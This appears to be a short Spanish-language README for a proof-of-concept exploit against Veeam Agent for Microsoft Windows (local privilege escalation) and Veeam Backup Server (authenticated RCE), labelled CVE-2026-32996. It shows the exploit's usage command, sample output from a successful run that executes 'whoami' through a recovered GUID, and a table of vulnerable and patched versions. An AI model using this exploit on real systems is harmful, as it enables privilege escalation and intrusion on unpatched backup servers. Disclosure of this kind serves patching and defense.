
Una vulnerabilidad en Veeam Agent for Microsoft Windows permite la escalada de privilegios local.
Ejecución remota de código (RCE) en Veeam Backup Server por parte de un usuario de dominio autenticado.
Consulta la publicación del blog para obtener detalles técnicos.
https://github.com/user-attachments/assets/8a570332-1cf6-4905-9107-8fcb973c9ce7
CVE-2026-32996.exe "whoami > C:\pwned.txt"
[+] Found Svc.VeeamEndpointBackup.log
[*] Searching for valid GUIDs...
[+] Valid GUID found: 9048554a-ec99-4e18-8bc4-edc637e8d8d4
[*] Executing command 'cmd /c whoami > C:\pwned.txt'
[+] Successful!
| Versión | Estado |
|---|---|
| 13.0.3.1220 | Totalmente parcheada. |
| 13.0.2.1102 y anteriores | Vulnerable. |